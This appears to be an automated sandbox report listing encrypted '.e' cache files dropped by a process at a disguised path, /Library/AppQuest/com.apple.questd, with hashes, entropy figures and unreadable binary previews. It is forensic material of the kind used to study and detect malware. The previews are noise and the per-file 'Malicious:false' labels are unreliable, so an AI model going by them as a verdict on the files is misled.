                                                                                                    SHA-512:E6BE4CD60C768F982CF45FA69CF2EBB0DC6BEDECC01022713EA19EE1FB955184CAE2C73378A8760541DEE7CA261C8A922B35AEA3F5EA1853B3AC65CA8AE1580B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .......3..d...[Z..@...q8.N9.......o*e..].].>.L..3.i.S=......loXF.P..O...1Ho&.8.z;L.2.9E.0./Z.F..r......,.....n}...t.m^..k.......l.g9 .XLv....3..;...r"?.|.Nd.5............................>v-.v.!N...G.2.\8xC.9./8..,J48y...}.<4L..J.P.H......7F.m...](.".4...ZE&G....&Nt...].......\.......Zt..3....U...+x...6.T..u.......V.."R#L+ZS..j..6...)..`...@w.U.p.vB....3124*...<....9...>..I<.]..l.+...LsV..Q..f: 4.P......&^..ly...+.].y...&.+.,..:._.i....v......P1E>|..o!?.....#..4]..kQd^/......4wY.........?.Ig..vs.-...n..h..n...'..R..2...?.k.rh...W...0=v.}.3.....y.5.|..u.0..q..,..".b..Ka`...:........IP.:x.).4.n....(...X.K.N\..!.....A.#..f.....i E.9.n'.uG.....(s1.mD.x....f..vu.3y...8.X......9..1z..5......G.-b._&<.6......d....U..caB.N.)....KM......C.u.;.?...40..o..1.....|....+..k^..Wsr.}..Y.E.H3[...1.k>*.ty....+-b.s.... }....z.=sP.;......s...Q...L}.........w..o....N40.q80N.Y.>8..~d..^....T.$.`.~.]...r..<j..*.8Gl..F.e..^#..:..&Q@n#..'..>=.J....._57..8,.A..........1.6.b......'.'..Vd...}I..>...:[....s.Vto.q.rX
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.085DCC01-6895-4692-8EAD-956FBF5962C4.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):132618
                                                                                                    Entropy (8bit):7.998404515767734
                                                                                                    Encrypted:true
                                                                                                    MD5:4ED3042AA0794009A5A1F6F7C1FC0A59
                                                                                                    SHA1:4AEB286D62687BD4A1B8CE23487883141A8E415D
                                                                                                    SHA-256:97A9E7419649E7D1FFBDB92999F82178D3C310D63BF69081B9A30F13166331B8
                                                                                                    SHA-512:14E68E1D517569FDF1D06BACCADF6B7CDB203290B4A64FB1213F413D3343385475796D39C2E43AC179130FEC67F93DE4D47AC77963F5C96EDEB1E18260CD3D19
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: Y..Q 4G..p.......h>L.......7..C$.z..c .4_/m.m...H...hdEz.+kW.*L>2P..*&.I...... /X.Y......y.NGN.W%W..h}.......r.#..S...5.Z..kq....m.....w..@....................A...... ...|...W.......8[....N.....p...$Z...c^S.g.T?.+. ...Y.)(..nNzFb."...2w..DBr...).........wh.b.....L.A.%.&.x0...^9..{.).>..W=..;.{.)0..0.y(qm...>{.$...y....."#3........>~.e....st...Kq+......1..T...y.....n.\....%..K$~6C....q..[.....wR..3.8gB9.....".M.....0.HR....]LMC'.......uA......q.z.`.62..R....gFJ...VoQ.1I..V.....bu.S@k........]4.....x~.X;v..]..<t...;.3.....va....ic..L.oh.........5f..a.w.}..........5.......Pu.9*.w..:......[uK.......{..x.=..Jn....B...0B......c."......c..!..Y.~..967..E....."2Q..e...D.A.C...d5.^...IC.:4..a..E..k...Qu..g.e...m.Y....AX..T.<.........W.s9.....6.!,Iy.]bQ.|.l..B"...J..Y..%.>~....~.*[[-...E.n.p...V.......t./..5Of//.#.....&..*o..Tb..n...n8M :......_.L.....|....w;..#...T.N.....3..t....Yw...wiX?.......$2.>.\.......J....,.F.Yz......x..;H.I.kN..=.Q7P.aJ...]....>O...R.z.~I.bD.....r$I^.~.hU...8clj..d...&5.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.0B879FA2-1D5D-487B-9F38-A47A8D28D06B.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):21923
                                                                                                    Entropy (8bit):7.9671339866938355
                                                                                                    Encrypted:false
                                                                                                    MD5:B766D441407C01E8841AD3468BFA7989
                                                                                                    SHA1:DC674EED28072A1A234448D7F099A3DC41C86D2A
                                                                                                    SHA-256:9929C34E3E65A64105D08C463A5D49DE49EAFA239EC8B1A824BD87A707EC9F76
                                                                                                    SHA-512:3AF014B99A80AE3A220DCFBC9FF5D56F666182B8833EC5B83EDCBBFCFC658847A3BFBC00ADE08C88B92872165FEC091EF81C5BE73D5865F6442DCECCB7200CBF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0.......G...Y..C.a.nB...y.o/%5..aja.....j.#.6.....3(Q...=R.HB.]E..G....|..... ..._...ii..NH..W..z>...&.....z/.3#-SE....9u..@e...l.K..1*.9$<..<:...........r.....x...........~L:P....j_V2M.../'.....}`7..u~.....h.9.pL..'....o...i...[p.Fi.n{...t.%*.c..I.Y.......8J......%.nB2-.I.u9.7J.i(j....I.n....}~.l..S.D..:t....wAQ(....E.:s.q.:....c....;...bg.*..41.?z^..B.)?/1.........=4S...Y..<1..m......r...j.. ..d@.k......V..m.cf5.a..c.}..rH$..1v:\......A...Z..Qx;>B.....L....7t..5Y...Dx..f._....$.....TG.Q...\...N[..<J...5..:.!.......smkJ.Wo.b.......*.-M.g1.+... ...2...#8J.......e.......rN?`P\......!P..n...gx...2...........7!.e.%JM.{...8.`aI....q7....p....!.).xn....b..F....9f......D....T...m.}s..+...Y.*..4.'c....m..a...z$....L..y.5...u.f\.<o\!b..x..1..H*Vp......WM3......H..G...C.Ux..&..i;.........jh.BW......).Mys|..%....{.Y..CJ.[L..6...r...Uz.M..,...(.....LQ..`w&.o..............i1d.Z..c.....t.IH........).~.;G......}.T.%Z........I.g.\...kUl.}.X....Q....H.e..k.!..4.;...JN...c.%yB.....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.0FAA63CE-4DC8-4FFE-B817-C3983250D6EB.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):19235
                                                                                                    Entropy (8bit):7.964517821722158
                                                                                                    Encrypted:false
                                                                                                    MD5:6CBE9665D92F088CE0473799884E168E
                                                                                                    SHA1:505561575FF30BF1CEBA2822F59184FEFA3996FD
                                                                                                    SHA-256:AA6676ABE230FCF24CD45327EA90BF457E4F28639BBEC18E8E8011868E9BE783
                                                                                                    SHA-512:BFDE5BEB7C4C7885D31748D50D80B93CF81D6AB059BE6F0E877D79DE4509929A7DCEFEF8108D5AFB78C720EE79CC046DAEA14975048BC9E02D20AA9A82CB1E7B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0....8.d.........PD...`.3i.dE........s......6.....3(Q...=R.V...[f..PT....Y9...Y....m.I.0.....8.f.JE.!P..n..*.....R.l6.....7@e...l.K..1*.9$<..<:...........r.....x...........~L:P.........|..'.;...%.aF2..6n.|.?f..b=.&.....$^ms%(.n<.3..D........!#.XM./CxA'......b.v\P;&.Q..U)>...9.7J.i(j....I.n..A;8x...E.0.rj."C....&L>....E.:s.q.:.....V2'M..#..>.........A..(...$.&..s.(O..Cb.y[M2i..^>.-.-T..p..nf5WW.....M...q...b.......z..XR$...q..1.......V.Z.*..u.F...F..m^..,3..Xy.S.<.A3._.._.bU.R.9..c.........V...&..6..$...I/..7Mx9.})0.....N..8..8?...1........"........sL...z.U.vHy.y.3......rN?`P\......!P..n..*.....R..O...*.....a.D...s.Xb8?......>r{.....W5.8.9.I.......,....T.x0...O..b'@=..:.E...ZD...O.v........RL...z.U..;....A>..?.......`.e. ....f.,.....K".R......Ua)..8.,...6w*...Q...i......b....!5.n."......M...f.h.....q.........y!....'1"....)?.l.!.|.}W...R#.Y.8..1'..S.M.>x?d.b..6..(G.....W>.......8..?k..'|.....Q~. .......).....j,5v....... {4?..z..^.0....<..........w.e*@...;..I...... ).
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.12A761BA-7F24-4417-92A6-408D944E5E55.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):86415
                                                                                                    Entropy (8bit):7.99729656005638
                                                                                                    Encrypted:true
                                                                                                    MD5:8AA0FE860D1284DD2DA69456076A2BF9
                                                                                                    SHA1:65D196DEE7541B817D2D7AF49DEBCFFDE4860AE2
                                                                                                    SHA-256:B323CD1FFDDB8FEE11E2636B52460D1E8960FD16821766CF2150C3A30C28B49D
                                                                                                    SHA-512:2EB092B1580CA0E71E1F19A927ADAEFB6F610791C970429BDEBC46C2A905C39649159F03A2E0AF8392F07C11040F76EF189859190E6323F8476E939A69668DE2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...[.<C.R..~V5......y..V..kB.....z..c .4.P...L...9.....W..........}.U..S\...Q& ..y..JN......<....O.....+.U#.....x.%CRH.r..,...G...Oe...b...>>...5.....sB..;Q.._.........................b.!.+.^(A`.v].5.....7V..._.Y...6...v....?|.....l.4sJ.#..I.f@..p........HV2.m..p.......'.&)m..<.s.."...?.~..P..e...w._......lv.:..St. .....X.....8..N.q.N..$.Ry....si ........g.,...}}...-c.11.!.~.T.g.!^.......&dg...;..?..7..}.3.1...F..{......ah.5.../..6.......#.0..M.M..N.PLl.Rk..I.F..WPf......9.........w./.E.y.......+.8.......=..')3.._..]......._lBx4.....0.P.......\.|_......y..04.....q.f.X.. /....,..0@uB....~.....we...Qw....~.....S|..4...........Db...........d....a....@..C....m8v..8...0.....Jr_V.x%!....\R0.G.~k..3Pe...E.d...."(......]D..z.%....i.....z)......]SCa.....=.-..9[.!......b.......0.*.u._\`..Dbi).....t...W...!Q..;.F....Xb6.C.N...#.....9....u...H.x.."..k......a...yi-;.f..$..O..)T/....&.......B.3....3U\t..^..M>.......PT8...4Jg...H.........P........p.......o..}q....p...Jo.....$,..W&..k3!dY.*:.h....v..F
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.155A11AA-DE5F-4CE3-A952-472364FA68D3.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):7562
                                                                                                    Entropy (8bit):7.940099741162118
                                                                                                    Encrypted:false
                                                                                                    MD5:8B000F5A23C25830D1FF0039D1D4E331
                                                                                                    SHA1:12D24186B8D72C4F60DC2D0BF4DA9720D5D97A74
                                                                                                    SHA-256:064CC71BE0E7277018EADC96355F823976698F2006671B5C2BBF777F1963A0FB
                                                                                                    SHA-512:624C9E6E43D919EBA0182C27BD1D8276CD3279A7652D26795B3B9857914D26A659A2154378AA6C90B242ED95C6DF077637905FD64BAC7CF2DB9B2D66075A694D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...S..6..d....U..Ff&9..]...?9..UQ....J..~.B.Ko...b{..T`......\...TbR....-4.........1...9./Z....q0(.............'j...&.F..3j..\2.....{,..(.....`....t....i...R.{....k{.*{.1._.."O..9.:>..P?...2..7..fjM.E.....>.S.!.>..#...?l....M....L..`%.W.>[.[............uE.v....P.....$.z..R...|.PSbq...g...?tT.-..b..N.;.S..%v6........7...N........A...>..[.NL'......'.a....PJ.b.......76...sXms...8%...<J..~...l'x..'.w...;.}\....J...).:..N.R{...C...<...X3f{.SG.?D.5....l..P...%...Y..{....4....}....b.a....5.uZ.>....*';....7...... JY.J.x....!he..,a...r.Q.9...m.W(.:l{U5....'./)...:b.f+p..0..?$.....`......e...F.../....3........x.n...`....z..!.t.Ku....e:....y..T.u.....=.nm:&.....Y..Bu=,^u.N.A.....i..H..'.J.#.fC)_..F.....~n....Jg.r..2....."N.....@.2.$......L..........&.#?n. ....X..~.J..I.L...Zg|..q].... R%...E...r!.i...u.......+6d.......`..X...n,d..F<..U..v..D~,j,.....^.....K....4r......Ce@+..g.Q\q...... ......]).3.....80l.&.^z..A.....Q....&........)........&m.z..p...)....X[5..s.....N....&.W.....d,2...O.....@...}g
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.174AD61D-7E21-473D-9667-1C67D4B6E670.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):9146
                                                                                                    Entropy (8bit):7.9389358149727025
                                                                                                    Encrypted:false
                                                                                                    MD5:9A42C1D2D7BD59F106369456F0D63A25
                                                                                                    SHA1:82B2D8E509F60CA4DC04131A91C486F56D618A31
                                                                                                    SHA-256:2122D16BC1F2941E6DC846B2C0D352F20F91A40B50D7136BA68DEAE8A8752A6F
                                                                                                    SHA-512:E8C85230A57E35C10A606F16FE43B92639501D9398C12BA495209ABDB61819BA0FA59A783F754A21097B54A47062BC910B204E41692F343AED66090179A4E89C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0....;.n........v.......&....W.&y:i.*[.."y..6.....3(Q...=R..A.()..O.....|./...O9..:f.&..<.....^.f&..W..8...G..y...V......q$.t......r......+.N8...J..s-.q|...A.I........T...;....e(.L....Sc`...?........G=.......Q.'..'(t...im..).S.....E....L8...............c.]Aji.Y......^...U..A..~.n...D..][.p3.5.E... ....;....V......q...D7...8..x'E!.....4.5....uph..Q....*}D7.v...1..=...0...l..jlm|,.$.@~...)..A;.f....._s..L.<..?..J..qt...V....P.#.>E.oY.T..'.C.Cd.d. ....:..(.?,..M..z......."........ja.....`p.1.......=..~...i.!.j.)v[+~hZ..O/..i....Y.\xR.J-I....ef.........;...C..?.......+.5j..U~.U....f,.C.G..?p.}..P2k.......'.=v+?:....x=N...5..YE.Gh:B..?VV.a.E7..#..g....O.H....N..er(6,jB.....P.w.N.XC..L.o.K.'....z.@;b. ..n.........?.......`.e. ....f.,.....K".R......Ua)..8.,...6w*...Q...i......b....!5....[......9.....cf..@..........y!....'1"....)?.l.!.|.}W...R#.Y.8..1'..S.M.>x?d.b..6..(G.....W>.......8.}I......r.!...&.+..5Y...Il.7.......}.......L..D]ny......Z........E....Q..kUl.}.X....Q...
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.1A4BCAE4-6A68-4AA1-9EA7-0054B0A11D06.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):8530
                                                                                                    Entropy (8bit):7.9502592867542665
                                                                                                    Encrypted:false
                                                                                                    MD5:9F51ECCE5817F90EF8D5C8D476FA4CCE
                                                                                                    SHA1:2D22961BE36B7A66142979DF43BD8D7C2ED46D22
                                                                                                    SHA-256:4A7B74FD0205464A57FEABF3F6EC94CCD3F495D48B83503B55A29C3EE6184A87
                                                                                                    SHA-512:2361E02DA28EC28CAB7D69957D7BF42BE243A8F145E58FD5B8A1ABAD6AD701137FC6F3A818B6EAE2242F976A4A2115F3692C35B624CFCF981BD3337BF3236B1B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: 3...EK.h.%.....i........?...Jk...a..m.>M....T...a....n.......U^..4a..f......I"B..5...K..-*A.......v.......j.GQ.....wKq....+1/...VaJ.\....EL'E.`.z .Q}3a....=...A. ...V.....fy.b:A...u.B...#o...2.SO.'IpDUM.a........r.T#W../.....W....X..P$...Vt.q....:Z.F....81..<........w.....j.u...C..J+...t.T.......*..p.+z..g......XR.h..8J...[.l9p........^.nd.~?...f.H....t.fL....*_._QV..c...=+.yq...0.o2..U4Z.2..........>...4X.Ae:....%m6.G...)NZ..b./.0........>.2.....b..kqB.....5..K.!2.....w..f........}..Z.,.O..E..,5%.>A.JiV...q.5.....N.......h..5y........x.!....{......})...p....4..$..[w....W....A{.....`..k. c......T..h,.e.~.MKW.+dh6.P..0......0CX..S...l...L..........-.........z .1.|.tuS.....T.`.1tS~...@...S.g.2...!...u........tGKcW.....b.z.5........>...Q..^.#L....Q9//.mE.......Vd.{...).au...M....A.u.F]..s>......2.S.~..M.K........O.{..Y.....jy......i...$Eo.V_j[.............3.(O...l..p......1.y!.0w..s.e.w0.s.......xP8..F^M.6.e.m.9...x...7..6a.i......&[...e....V.LR.V.6..io...0..o..{-..x......-W...A..;..{.P..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.21E8A8F1-942B-4303-A336-E8CA4C57D00A.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):110088
                                                                                                    Entropy (8bit):7.997887768028113
                                                                                                    Encrypted:true
                                                                                                    MD5:343035CFE5ACD9B504C23E9213FA55A5
                                                                                                    SHA1:803746948F12BAC661B01C93EE0F807D0D7737E9
                                                                                                    SHA-256:C47B5A2B82D567E91156AD527715798C905059865E2EF2C357F493DC9F92E6E7
                                                                                                    SHA-512:7F636D41C983F1E06C8FA66A2E9F0C66EC63756B673827621BDF4ADB6B25F11F38BF4743F93BEC34E8DBB7E0013590D12FB499B56D0A6F301C96789F8AD8F391
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: I...k.{..KI...=..L........j.e.a...o*e..]..a.+.kt... 6?E.d).,....%..Q..*z..he9*Wj....c...s...i.S....:...n......>WW.....).Qf.....~]..x.R.N..._0.Dz.....&....s.R..a./...R=*...b.?{*......8[.bC....J..#..7..?u.4..'...4........:Y\....l\#.*.?T....%3.2].g#9.~[8-..J......,L..[1..c..tFG`...s....V.H.r..o9.Q...-...Y.....(..+..q.r.K.;+..e..9....12......)8{..z.InR..M...{'..%g.{`..j.G.....O...Ip.....`2~f..t.LA..{.....Yw..!....e....g.|-Y............,Ax?.....$t..uE..T.k~.(...N......b.......v.......c.].o..4`N.z..+..j.......AvN..m.q.'..`*9WU.2N..........f.x....P.:...=w}.".[...S.mY......fB+.y...8...$...'.|..:..t..)o.. .....f@...E.^+...'........^.....c+@........j.s.......Jn.?BGJ?.P;...%T!..Z...)..3.....$.D-.......d.....RL.....&0.E..!....h...%3......,.....'.g.jK...5...H.!..-.^y.......= Iw~+.5..EY...2.g.?.%~.3.......-&nF..a.Y..U......A...S.\...rp......6....h..8...~.6...,...d....@u..Q5..........vZ ......F. ._.m.vP.....X#...J.#.=.tP...s............N.~*..t!$.y.k....L...[..uI..~..:(f.O....[of .n.1.E/.9....!...Wt'.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.2201A119-1E1A-4072-878E-5C3054FC346A.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):57557
                                                                                                    Entropy (8bit):7.972092770854869
                                                                                                    Encrypted:false
                                                                                                    MD5:745D43F0660EE211DC36095EF48FE925
                                                                                                    SHA1:F582F0582010BDB633CB92E8D25D549686FA5A0B
                                                                                                    SHA-256:603C59CB7D149A843899F01C819B8314AF1D1F2F9AF15729843CBDCD6FE7A1F2
                                                                                                    SHA-512:3724A133E5F553499684CCE5975C9C042C5CED9E60C6B586A6968EA431D97309FB3CC5F3C122E8668FDE2C966323CC7E440B917DCBA9E8B5386FD55E6E93066B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0....A#.n...P...f...p..|.N.4..Ft..9.id..dc..6.....3(Q...=R.$K:R...qV...".'.[..^b...,...r]h.hfL.gn.....`.....!.w..#?......q$.t......r......+.N8...J..s-.q|...A.I........T...;....e(....A..*.....U.q.b....rz...w6(..\..3F....&t9..o8<..>.";K.L.Y't..'E.^..s.6....d.....@.....*.9....$..~.n...D..][.p3.V.......F...0......O.B.q...D7...8..x'E!.X.~?.j...+!..O>.._........\...>.Q.?<..l>......uRA9..si.AW.}*jo...a>~...1.rA....[.pmT...%.......^>.-.-T.J......r.}*.$.n.."......8...z.............slcG..F .&.....D.Nf...h.U..?e...W9..B.>x.L.B:{.V.u...n..}....l9.})0.......!)Lt.9....>.:+[.-l%1:X....2..!P..n........!....c...HK,.<.....^...Z~Tp.U..."....=.._.v8n.p....>..n.g..a...>..R.....]..=..].n.c.....2-..!0...h.%...-........G".....H<.DX.Ck....Zoa...g....~...SFx!..rhdb.....$...P4....{.v..IF.h..Jo.6"..1<.......3.......*v.(w/....nb..s.d.#<.v1..U.%..i%..y......p.......{.1.!.&w...1..Cv..^C.}.^....H.q........}.N.{k".O..Y.[T5....qyv..`.C89...w..C6......G..).&..0.._...$.ld..o..i/..E.M.O.$.7.a(.E..(...
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.262F6A45-8570-487A-8CCE-9A2A630640A0.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):18331
                                                                                                    Entropy (8bit):7.9609261392872765
                                                                                                    Encrypted:false
                                                                                                    MD5:8D44DD1E8255FB81574F61634AF07094
                                                                                                    SHA1:FDC455639279392CE123C6CCF597143179CADD1D
                                                                                                    SHA-256:BE754AA555422A401A7AC0FF86D8309A24EAA6AEF1F960AB807BF695039C20F7
                                                                                                    SHA-512:51280AD8B2EB39DE134FF4D9534D6A8203C8308A894C09650118582E61992DCAC7A9F4D4DAF5E356EBDEF76FE252DD28AC119D1CC0CC0A065246B46D49C72F3F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0....A9..bRgx...$0........` .Vq}.....y......6.....3(Q...=R...I..lMFoo@...)/[..^b...,...r]h.hfL.gn.....`....B......^Mu.P._........M.......!.!..x..........h.9j.....X.#2K__...}.u.....K.tW..l...f`7.w&...f.j..........H.........E........,..A...6wb......D...5.p......VQ.M..`2..n...|.I........]:...>...[.Yo....qy(xJSrO..|.!.j]..Z..NF)s...X..6..w....F.....e.....%..I.P.....w[..".+~...WbG..6.b..i..G....l.H....,k]w..qT~I.hb.........}.......n...aNOV.9....17......R...NO.w...O.0......]y4...]q.%.^.f.$.u.a4...i2.`$.R.....y..5..Z7.A.x...Q..^^.R.....f.&.c\..=..{a30.G.2.Od1.`.Y...#..pB..a*.V....ro..cB/.+.[(.W.:+[.-l%1`P\......!P..n...../..?:....I..[.ko...Kx....EP......B.\.A...{.c...Z.....Y.E...|U..|4~D.SX9.,.......:.+qn.\^.../{...;<.Y-'.hk..G....^).....~...`..A..1..-.T.......2w...z...#...Vh1.?z^..B.)?/1.........=4S...Y..<1..m......r...j...j..1........V. sQ.6[.c.%Z8.....UtA......@....zM.......<..g5...G0.|..C..t.|....N.~...8...on"...'0cx.DM...C...w.~..-.q....i...{/._L...Jx.}..M.<w.,M-J>M.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.27EDE4E1-D2B2-4331-AB9A-AD59D0D67120.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):25403
                                                                                                    Entropy (8bit):7.98868742657612
                                                                                                    Encrypted:false
                                                                                                    MD5:6F045630AC8A7ADA240BAC8B2A48EF7A
                                                                                                    SHA1:890947B2C427F87C2BEC8E89A498E110C706B83B
                                                                                                    SHA-256:C2376B2711232BA1501FBDB63EE37B67CBC3AD831D12B7B96D054F1037791CDF
                                                                                                    SHA-512:41DD8CDAF747830EC944B6697FD132AA6729CBCE83D79EAD9EC3B8D3CCE0F7876A9F4FB25EB1DC40FDE0DDCFFB0B2C493DC8E32A2EC41485C06A69A31812869B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...0....1.-..A2......6.#..I'4..."-.....U.f..N....t2.}.g|.....o..n7.......E....15-....W.........h%zw.uF..J..Ju..k/........]...=..nW.=h..O4.....Ip.....w*J.........w.P.z.VA..d.....|.h....<..v.....4.7....hJh.P.u..K.).#{..'.k.a....P.G.H.R.h %.g.y.F..8....a../.Y..3......P.~"J/......K&......M5%k......j.{*Fz.........A..y.O.].V.z6*.....\.'.,s...z....i...Z2.A.q...Lk.}.e.|.....c|....+....?f......P.;......S....6R|.....5A..^H..f=..@29L.c..t..{o....4.1......k.iq}2r+&Yk..kOwg........2.0.pFrL.YX.-....q>....Mo.p7.<..=.ZK..Ct...W }s.I...oM........T.......^#...'.;<t.B....}da;...m/....m....1.~ON..@a,...X..........2m.m.3R...StvQ.....I..|=..,...l08vp|..a.(.s...'/N.)..Y.4.....B........Clg1...d.>.s..,.....J...3...k....7{...sJ..W....@K....:]....Odk..<f.#....R....r./.W...[.~.tQy..(....y......?....!KR....*...J.......1`..;..",.t....U[B..r.u....~X.....S.u...e..1.A.4$.@......s.....=wyc..G.>P[/7T..],..........;seVxx.Ip ..\'/-].og..H........F..<....$:.|.=f..c..jY..X.R...>...W.Z.,Qu.c..Z#.2.....Y..C.c.t..!%..Wbi.p".%.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.2B7EA0E1-2310-4A5A-9147-3E3C1264EF04.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):9482
                                                                                                    Entropy (8bit):7.95544841631542
                                                                                                    Encrypted:false
                                                                                                    MD5:06EF5E6489136EDD70A86BFC11DA29E9
                                                                                                    SHA1:065EA39444560E5443A7983714FC0926C8BF2683
                                                                                                    SHA-256:27DD9B62034FDC2C255BD7BEAC0043DBAFB517EB608B2D313989A1AA96E522A3
                                                                                                    SHA-512:6B71BFA71530B9A8C8B7CA59AC08D5B80CBD5F30ED8AC6738EEF9EE2199950AE1543FFE817B0830E1DBD8E6FCC3648AB93C9BBD7EBE49A4FE135C7A825CEEFF1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .8.o....b..xh.izY......S>.7<..eT.K...).q*..........C7.F|y.].........u(:.....Z)nS.2.8m..5_...Y..-!Q..q9%(:.,..F.m.....i..l.@:MP^......i.j..Z..2.X'....7.O..pP..}....As.V....~....hzD....Ctj...q..]...}.4. .#...$...'.4eU.m.u.]:....!....+@...:.>%k...]&...'md...A.....#..Z.....q.........}..2-B..u..kA.rJl.Z..!.I.MK......z..........h......S\.B..YG.....Qh....,....6..3&T..Q...i2..o..@a].....H..~......[F.kf........3.*.5.n...K.DcV..Zk\......#._-^d.....A.t..q....9.........[{.$..!,...Y..S....(W<.w5.s...je.q\.......I...M,5I.....w...`rx./....tj......0..sg&.....WX.g..X......,...{.$.`$Wb]Y...}...H..bVTp..j.?.Z.O.1..u..e...fD.&5.*.9.4._t.L]..i....I........0......O>..!U..d.`T....Y....\.r....0..L.(@bX?..V.w.............V...D...s+...F..<)$....4...........v...f~t..K..I...!.-D..sk.F(j..y.t:jH....$..%.O..<.0..4.4@....{..5.n...o...=K....Wj..8...E.PY..d-.[....]~....@......z:|.,[y.3.g......!.NMa.........6.YC...gY.&..:......Tj..p_....G.....N.~.H.'1J... 7e..........Xuc...t..?..!m..........1.T....f.\.W`.%.....?.......
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.2E324B89-3B0E-4C08-B5BD-BB0EF772AC88.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):86199
                                                                                                    Entropy (8bit):7.997270353352466
                                                                                                    Encrypted:true
                                                                                                    MD5:D891B6F1AD6B33051D773A492B64FF59
                                                                                                    SHA1:41357E014AA022676EB86943D35D3AE6840BEE42
                                                                                                    SHA-256:F7892186316BD934B8CAFB8207B7E2BC2485DBBE5EDD9E14226F50041DAB3D29
                                                                                                    SHA-512:CE7CCDF1B9AAF1265F2DA9C71E0AA62009B6929340303BEC423A33D494E30F8680D3C7770FF229FD8BD5C7E83655D47EDE468633061D552CDC08B667803AF87C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .......b..)....>.fc.....\..9.q[..z..c .4....i.....~@o...............{..]....m./.A".6`G....M.,...`.2..T.).J......s..q3. OB....(....=-L.{.../|....FbK..Q....Jd...N...x...).................... ..]..../.!x...{_H...q...x...m:c........A........;e.OH...t .6...2....).$......r.:.(....P.^.q..-N.}......"........S..#.d.8.....I.....v.`.y.4..7FI....,%4..'...@.K...,......}..S............G..!....O5.5.btK..j.9.......P....0......i5..owfw.0.1.=bu[&^~.....f....{...G....q..Ov/L.!K......K.]...7........#..e.S.w.%...e|..."...E."U.}v...g..............{+.v.......Xv....-.B..-.....3h..d.xJ.....`...\.J<..W.y..2.cw..u..J~+:.)y...`....{K....d..x.m.l....:..]......+.yE..g.F.I-F..*..y.c.h^.#.*.1...`Z.y.BQ.".g.j..j.....|..-.XK..3k.|..B4[t.wZ...-.'..`I8,.....,|J.W'..-z.wV....d.X...HC ........L_.X.\.[..W~. ^.Y.,....K.>.&....H.x....j...o.......C^.}>..X...Jo...co`..ZT.5.Z..[..........).a..I....`?.L1....1.....p8E.:... ....;|.7C..sFI..H.O.6...|...q....[.og....{...=.^.A..c.'...D..7..s..BL.{.M.1.|...UR.7H&.E|D>..R....}....#.Y|..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.2E3DD52A-C3DD-48C8-AD6E-F6799B07859E.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):12002
                                                                                                    Entropy (8bit):7.968234120092701
                                                                                                    Encrypted:false
                                                                                                    MD5:18808ED71B00CB441FD5ABDE816808EF
                                                                                                    SHA1:366AC23694DBA3DC37C700A4B7B7D9C3422289B2
                                                                                                    SHA-256:3C4E63C78622B4B80A5CBF5D302710738D2BD815A3A1BCC826F13A054518CC98
                                                                                                    SHA-512:D7847BF57010A2FD6152E87478823DE81B73C3DC7F9D97F580953E222128E75DA321677A4642AF927B2029A8F78E8A427787EA0ECF4200D52C672DD449C3FE09
                                                                                                    Malicious:false
                                                                                                    Reputation:low
